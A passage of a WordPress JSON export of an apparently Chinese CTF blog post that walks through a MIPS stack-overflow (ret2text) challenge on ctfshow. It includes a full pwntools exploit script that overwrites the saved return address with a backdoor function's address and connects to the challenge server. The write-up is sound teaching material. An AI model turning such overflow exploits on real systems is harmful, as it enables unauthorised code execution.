lazyload-container-unload' data-fancybox='post-images' href='http:\/\/n0ps1ed.top\/wp-content\/uploads\/2025\/05\/L1EKPKHZ6RY7WNWMKT.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"801\" height=\"201\" data-original=\"http:\/\/n0ps1ed.top\/wp-content\/uploads\/2025\/05\/L1EKPKHZ6RY7WNWMKT.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-1050\"  sizes=\"auto, (max-width: 801px) 100vw, 801px\" \/><\/div><\/figure>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/n0ps1ed.top\/wp-content\/uploads\/2025\/05\/JHRFBAPC48QS389BN.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"566\" height=\"206\" data-original=\"http:\/\/n0ps1ed.top\/wp-content\/uploads\/2025\/05\/JHRFBAPC48QS389BN.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-1051\"  sizes=\"auto, (max-width: 566px) 100vw, 566px\" \/><\/div><\/figure>\n\n\n\n<p>\u540e\u95e8\u51fd\u6570\uff1a<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/n0ps1ed.top\/wp-content\/uploads\/2025\/05\/A2714ZVPS5KMN4T__O.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"305\" height=\"143\" data-original=\"http:\/\/n0ps1ed.top\/wp-content\/uploads\/2025\/05\/A2714ZVPS5KMN4T__O.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-1052\"  sizes=\"auto, (max-width: 305px) 100vw, 305px\" \/><\/div><\/figure>\n\n\n\n<p>\u6253\u6cd5\u5f88\u7b80\u5355\uff0c\u6ea2\u51fa\u8986\u76d6\u8fd4\u56de\u5730\u5740\u5373\u53ef\u3002\u7531\u4e8e\u662f\u5f02\u67b6\u6784\uff0c\u4fa7\u91cd\u70b9\u5728\u4e8e\u5b66\u4e60\u5206\u6790\u4e00\u4e0b\u6c47\u7f16\u4ee3\u7801\u3002<\/p>\n\n\n\n<p>ctfshow\u51fd\u6570\uff1a<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/n0ps1ed.top\/wp-content\/uploads\/2025\/05\/G0LXTA9XQUDSS1LIZ1K.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"836\" height=\"738\" data-original=\"http:\/\/n0ps1ed.top\/wp-content\/uploads\/2025\/05\/G0LXTA9XQUDSS1LIZ1K.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-1053\"  sizes=\"auto, (max-width: 836px) 100vw, 836px\" \/><\/div><\/figure>\n\n\n\n<p>v1\u53d8\u91cf\u53600x18\uff0c\u7d27\u63a5\u7740\u662f$fp\uff08\u5373x86\u7684ebp\uff09\uff0c\u7136\u540e\u5c31\u662f\u8fd4\u56de\u5730\u5740$ra\uff0c\u6240\u4ee5payload\u662f\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>payload = b'A' * 24             # \u586b\u5145\u5230fp\npayload += p32(1)               # \u586b\u5145fp\npayload += p32(backdoor)        # \u586b\u5145ra<\/code><\/pre>\n\n\n\n<p>\u4e3a\u4ec0\u4e48\u6ca1\u7528sleep\uff1f\u56e0\u4e3a\u8fd9\u662fret2text\uff0c\u6ca1\u7528\u5230shellcode<\/p>\n\n\n\n<p>\u5b8c\u6574exp\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>from pwn import *\n\ncontext(arch='mips', endian='little', os='linux')\n\n# \u76ee\u6807\u7a0b\u5e8f\n#p = process('\/home\/monke\/Desktop\/MIPS_PWN\/pwn1')  # \u672c\u5730\u6d4b\u8bd5\np = remote('wn.challenge.ctf.show', 28302)  # \u8fdc\u7a0b\u653b\u51fb\n\n# \u5173\u952e\u5730\u5740\nbackdoor = 0x4005dc\n\n\n# \u6784\u9020 payload\npayload = b'A' * 24             # \u586b\u5145\u5230fp\npayload += p32(1)               # \u586b\u5145fp\npayload += p32(backdoor)        # \u586b\u5145ra\n#gdb.attach(p)\n# \u53d1\u9001 payload\np.sendlineafter(b\"Please enter your input: \", payload)\np.interactive()\n<\/code><\/pre>\n\n\n\n<p>\u6253\u901a\uff1a<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/n0ps1ed.top\/wp-content\/uploads\/2025\/05\/GAEB4QLR9V8JC@KV2LRJ3W-1024x382.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"382\" data-original=\"http:\/\/n0ps1ed.top\/wp-content\/uploads\/2025\/05\/GAEB4QLR9V8JC@KV2LRJ3W-1024x382.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-1054\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n","protected":false},"excerpt":{"rendered":"<p>\u53c2\u8003\u6587\u7ae0\uff1a https:\/\/blog.itewqq.cn\/mips-pwn-tutorial\/ https:\/ [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[13],"tags":[26],"class_list":["post-1039","post","type-post","status-publish","format-standard","hentry","category-13","tag-26"],"_links":{"self":[{"href":"http:\/\/n0ps1ed.top\/index.php\/wp-json\/wp\/v2\/posts\/1039","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/n0ps1ed.top\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/n0ps1ed.top\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/n0ps1ed.top\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/n0ps1ed.top\/index.php\/wp-json\/wp\/v2\/comments?post=1039"}],"version-history":[{"count":6,"href":"http:\/\/n0ps1ed.top\/index.php\/wp-json\/wp\/v2\/posts\/1039\/revisions"}],"predecessor-version":[{"id":1055,"href":"http:\/\/n0ps1ed.top\/index.php\/wp-json\/wp\/v2\/posts\/1039\/revisions\/1055"}],"wp:attachment":[{"href":"http:\/\/n0ps1ed.top\/index.php\/wp-json\/wp\/v2\/media?parent=1039"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/n0ps1ed.top\/index.php\/wp-json\/wp\/v2\/categories?post=1039"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/n0ps1ed.top\/index.php\/wp-json\/wp\/v2\/tags?post=1039"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}